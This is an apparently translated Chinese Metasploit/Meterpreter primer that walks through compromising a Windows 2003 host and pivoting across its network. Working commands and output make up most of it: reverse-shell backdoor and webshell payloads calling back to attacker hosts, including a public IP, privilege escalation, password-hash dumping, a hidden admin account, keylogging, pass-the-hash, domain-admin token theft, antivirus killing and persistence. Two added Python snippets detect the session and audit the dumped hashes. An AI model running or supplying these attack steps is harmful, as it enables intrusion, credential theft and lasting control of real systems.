Meterpreter primer (with continuation)
Detailed commands:
:~# cd /tmp/
# mkdir keio
# cd keio
# ls -al
总用量 8
drwxr-xr-x 2 root root 4096 2012-10-26 02:59 .
drwxrwxrwt 11 root root 4096 2012-10-26 02:59 ..
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 X > /tmp/keio/payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.0.167", "LPORT"=>"443"}
# ls -al
总用量 84
drwxr-xr-x 2 root root 4096 2012-10-26 03:00 .
drwxrwxrwt 11 root root 4096 2012-10-26 02:59 ..
-rw-r--r-- 1 root root 73802 2012-10-26 03:00 payload.exe
#
-------------------------------------------
Target host IP 192.168.0.246. On the Windows 2003 box an ordinary user is added first; Meterpreter is then used to escalate privileges (the same steps work for escalating from a webshell).
C:\Documents and Settings\Administrator>net user keio keio.asd /add
命令成功完成。
C:\Documents and Settings\Administrator>net user keio
用户名 keio
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2012-10-26 15:01
密码到期 2012-12-8 13:48
密码可更改 2012-10-26 15:01
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\Documents and Settings\Administrator>
------------------------------------------------------------
On BT5, open another terminal and start a listener for the backdoor exe:
:~# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E
[*] Please wait while we load the module tree...
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.0.167
LPORT => 443
[*] Started reverse handler on 192.168.0.167:443
[*] Starting the payload handler...
Now copy the backdoor exe generated above to the 2003 host and run it (it can also be run from a webshell for escalation).
When it runs, a Meterpreter session is opened:
[*] Sending stage (752128 bytes) to 192.168.0.246
[*] Meterpreter session 1 opened (192.168.0.167:443 -> 192.168.0.246:1036) at 2012-10-26 03:10:03 -0400
meterpreter > getuid
Server username: KEIO-850DBAD911\Administrator
meterpreter > shell
Process 2448 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\桌面>net user keio
net user keio
用户名 keio
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2012-10-26 15:01
密码到期 2012-12-8 13:48
密码可更改 2012-10-26 15:01
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
C:\Documents and Settings\Administrator\桌面>^Z (ctrl +z)
Background channel 1? [y/N] y
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem (privilege escalation)
..got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump (dumping the hashes requires SYSTEM privileges)
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY bdcf1f289008f1eea7b42d7b6b0e1306...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:246f6b6da6b0dd59ef189f2a65f3f0ca:::
ASPNET:1003:8607cfc7e85b23193eea6d0e417a1498:1af6226ed57db97d49a58c2ec2f3f713:::
keio:1006:047770cf7e1a2a874a3b108f3fa6cb6d:da1e539768c66a250b5858e2665c8f34:::
meterpreter > ps (list processes)
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
300 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
332 316 explorer.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\Explorer.EXE
348 300 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
372 300 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
420 372 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
432 372 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
496 1632 conime.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\conime.exe
616 420 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
624 332 ctfmon.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\ctfmon.exe
636 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
712 420 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
772 420 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
792 420 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
820 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
916 332 VMwareTray.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
952 420 WVSScheduler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Acunetix\Web Vulnerability Scanner 8\WVSScheduler.exe
964 332 vmtoolsd.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1092 1432 TPAutoConnect.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
1136 420 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1332 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1432 420 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1512 420 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
1632 332 cmd.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\cmd.exe
1680 420 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1704 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2080 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
2392 332 payload.exe x86 0 KEIO-850DBAD911\Administrator $U$C:\Documents and Settings\Administrator\\payload.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e65c7061796c6f61642e657865
2448 2392 cmd.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 332 (migrate Meterpreter into another process, here explorer.exe)
Migrating to 332
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : KEIO-850DBAD911
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > screenshot (capture the target's desktop; the image is opened automatically)
Screenshot saved to: /root/TCvXoBVK.jpeg
meterpreter > shell (drop into a cmd shell)
Process 3532 created.
Channel 2 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator>net user 123 123 /ad & net localgroup administrators 123 /ad (add an account "123" with password "123" and put it in the administrators group)
命令成功完成。
C:\Documents and Settings\Administrator>net localgroup administrators
成员
-------------------------------------------------------------------------------
123
Administrator
命令成功完成。
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\Documents and Settings\Administrator>tasklist /svc (list processes with the services they host)
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 300 暂缺
csrss.exe 348 暂缺
winlogon.exe 372 暂缺
services.exe 420 Eventlog, PlugPlay
lsass.exe 432 ProtectedStorage, SamSs
vmacthlp.exe 616 VMware Physical Disk Helper Service
svchost.exe 636 DcomLaunch
svchost.exe 712 RpcSs
svchost.exe 772 Dnscache
svchost.exe 792 LmHosts, W32Time
svchost.exe 820 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, HidServ, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, SENS, ShellHWDetection, winmgmt,
wuauserv, WZCSVC
WVSScheduler.exe 952 AcuWVSSchedulerv8
vmtoolsd.exe 1136 VMTools
svchost.exe 1332 TermService
TPAutoConnSvc.exe 1432 TPAutoConnSvc
dllhost.exe 1512 COMSysApp
msdtc.exe 1680 MSDTC
svchost.exe 1704 TapiSrv
explorer.exe 332 暂缺
VMwareTray.exe 916 暂缺
vmtoolsd.exe 964 暂缺
ctfmon.exe 624 暂缺
TPAutoConnect.exe 1092 暂缺
cmd.exe 1632 暂缺
conime.exe 496 暂缺
wmiprvse.exe 2080 暂缺
cmd.exe 2448 暂缺
cmd.exe 3096 暂缺
cmd.exe 3532 暂缺
cmd.exe 3640 暂缺
tasklist.exe 3800 暂缺
wmiprvse.exe 3836 暂缺
C:\Documents and Settings\Administrator>netstat -ano (note that Terminal Services on 3389 is not listening)
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 432
TCP 127.0.0.1:8181 0.0.0.0:0 LISTENING 952
TCP 192.168.0.246:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.246:1036 192.168.0.167:443 ESTABLISHED 2392
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:1025 *:* 772
UDP 0.0.0.0:1027 *:* 772
UDP 127.0.0.1:123 *:* 792
UDP 192.168.0.246:123 *:* 792
UDP 192.168.0.246:137 *:* 4
UDP 192.168.0.246:138 *:* 4
C:\Documents and Settings\Administrator>^Z (ctrl +z)
Background channel 3? [y/N] y
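From the defender's side, the netstat -ano and tasklist /svc listings above are enough to spot the session: the only ESTABLISHED connection belongs to a process with no service behind it. The following added example (not part of the original post) correlates the two listings and flags such connections; the sample lines are constructed from the transcript, and the allow-list of expected client images is an assumption.

```python
import re

# Assumption: image names that are expected to hold outbound sessions on this host.
ALLOWED_CLIENTS = {"iexplore.exe", "lsass.exe"}

# Constructed sample, taken from the netstat -ano output in the transcript.
NETSTAT = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8181         0.0.0.0:0              LISTENING       952
  TCP    192.168.0.246:1036     192.168.0.167:443      ESTABLISHED     2392
  UDP    0.0.0.0:1025           *:*                                    772
"""

# Constructed sample, taken from the tasklist /svc output (Chinese locale
# prints 暂缺 where an English system prints N/A; long service lists wrap).
TASKLIST = """\
svchost.exe                    772 Dnscache
svchost.exe                    820 AeLookupSvc, Browser, CryptSvc, dmserver,
                                   EventSystem, HidServ, lanmanserver
WVSScheduler.exe               952 AcuWVSSchedulerv8
payload.exe                   2392 暂缺
cmd.exe                       2448 暂缺
"""

def parse_netstat(text):
    """Return (local, remote, state, pid) for each TCP row; UDP rows have no state."""
    rows = []
    for line in text.splitlines():
        p = line.split()
        if len(p) == 5 and p[0] == "TCP":
            rows.append((p[1], p[2], p[3], int(p[4])))
    return rows

def parse_tasklist(text):
    """Map PID -> (image name, [services]); wrapped service lines are folded in."""
    procs, last = {}, None
    for line in text.splitlines():
        m = re.match(r"(\S+)\s+(\d+)\s+(.*)$", line)
        if m:
            last, svc = int(m.group(2)), m.group(3).strip()
            names = [] if svc in ("暂缺", "N/A", "") else [s.strip() for s in svc.split(",") if s.strip()]
            procs[last] = (m.group(1), names)
        elif line.startswith(" ") and last is not None:  # continuation of a service list
            procs[last][1].extend(s.strip() for s in line.split(",") if s.strip())
    return procs

def suspicious_outbound(netstat_text, tasklist_text):
    """ESTABLISHED connections owned by a non-service process outside the allow-list."""
    procs, hits = parse_tasklist(tasklist_text), []
    for local, remote, state, pid in parse_netstat(netstat_text):
        image, services = procs.get(pid, ("<unknown>", []))
        if state == "ESTABLISHED" and not services and image.lower() not in ALLOWED_CLIENTS:
            hits.append((pid, image, local, remote))
    return hits
```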
meterpreter > run getgui -e (enable Remote Desktop on port 3389 on the target)
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20121026.3428.rc
meterpreter >
Open another terminal:
:~# rdesktop 192.168.0.246 (connect to the Windows server from Linux)
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Log in over Remote Desktop and you are on the server.
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.jsp
msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E
msfpayload php/reverse_php LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php
msfcli multi/handler PAYLOAD=php/reverse_php LHOST=58.60.195.226 LPORT=1234 E
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 R | msfencode -t asp -o webshell.asp
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E
meterpreter > run post/windows/capture/keylog_recorder (start the keystroke logger)
[*] Executing module against KEIO-850DBAD911
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20121026033842_default_192.168.0.246_host.windows.key_690857.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exit
:~#
Open another terminal to view the captured keystrokes:
:~# cat /root/.msf4/loot/20121026033842_default_192.168.0.246_host.windows.key_690857.txt
Keystroke log started at 2012-10-26 03:38:42 -0400
i lover ni
:~#
Pass-the-hash against other hosts on the internal network: the other host must have port 445 open and you must already have its hash.
:~# msfconsole
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.0.167
LHOST => 192.168.0.167
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.0.126
RHOST => 192.168.0.126
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(psexec) > set SMBPass ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba
SMBPass => ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.0.167:443
[*] Connecting to the server...
[*] Authenticating to 192.168.0.126:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Created \PPzjnNQC.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.126[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.126[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (Bdhlogxp - "MHqf")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (752128 bytes) to 192.168.0.126
[*] Closing service handle...
[*] Deleting \PPzjnNQC.exe...
[*] Meterpreter session 1 opened (192.168.0.167:443 -> 192.168.0.126:1062) at 2012-10-26 03:46:49 -0400
meterpreter > sysinfo
Computer : KEIO-850DBAD911
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > shell
Process 3152 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.126
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\WINDOWS\system32>
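The hashdump lines dumped earlier, one of which was reused verbatim as SMBPass above, are in pwdump format (user:rid:lm:nt:::). As an added audit example (not from the original post), the following parser reports accounts that still store an LM hash, the weakness that makes the LM half crackable, and accounts whose NT hash is the well-known empty-password value; the sample lines are the transcript's own, and the remediation hints are assumptions added here.

```python
# Well-known constants: LM hash of an empty/absent LM password, NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input copied from the hashdump output in the transcript.
HASHDUMP = """\
Administrator:500:ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:246f6b6da6b0dd59ef189f2a65f3f0ca:::
ASPNET:1003:8607cfc7e85b23193eea6d0e417a1498:1af6226ed57db97d49a58c2ec2f3f713:::
keio:1006:047770cf7e1a2a874a3b108f3fa6cb6d:da1e539768c66a250b5858e2665c8f34:::
"""

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) from 'user:rid:lm:nt:::' lines; skip malformed lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        yield parts[0], int(parts[1]), lm, nt

def audit(text):
    """Return (user, finding) pairs for LM storage and empty NT passwords."""
    findings = []
    for user, rid, lm, nt in parse_pwdump(text):
        if lm != EMPTY_LM:
            # Assumed remediation: enable NoLMHash, then change the password so
            # the stored LM hash is dropped.
            findings.append((user, "LM hash stored; enable NoLMHash and rotate the password"))
        if nt == EMPTY_NT:
            findings.append((user, "empty password; disable the account or set a password"))
    return findings

def users_with_lm(text):
    """Convenience view: accounts that still carry a real LM hash."""
    return sorted(u for u, msg in audit(text) if msg.startswith("LM"))
```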
Other Meterpreter tricks
Token impersonation
ps (list processes)
If a domain administrator has logged on to this host,
there will be processes running under a domain-admin token;
steal_token <pid> (impersonate that process's token and you are now the domain admin)
use incognito (load the module)
list_token -u (list the user tokens that can be impersonated)
Once a domain-admin user has been impersonated successfully,
add a domain-admin user:
impersonate_token caonima\\domainadmin (note the double backslash)
add_user keio keio.asd -h 192.168.0.175 (address of the host on which the domain user is created)
add_group_user "Domain Admins" keio -h 192.168.0.175
Pivoting to other machines through Meterpreter
The compromised host sits in 172.26.36.*,
but the target is in 192.168.1.*:
run get_local_subnets (show the local subnets)
background
route add 192.168.1.11 255.255.255.0 1
route print
use ... (then run the chosen module through the pivot)
Meterpreter scripts
run vnc (install VNC on the target)
run screen_unlock
run killav (kill antivirus software)
run scraper (collect system information)
Persistence
run persistence -X -i 60 -p 443 -r 192.168.0.167
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.167
set LPORT 443
exploit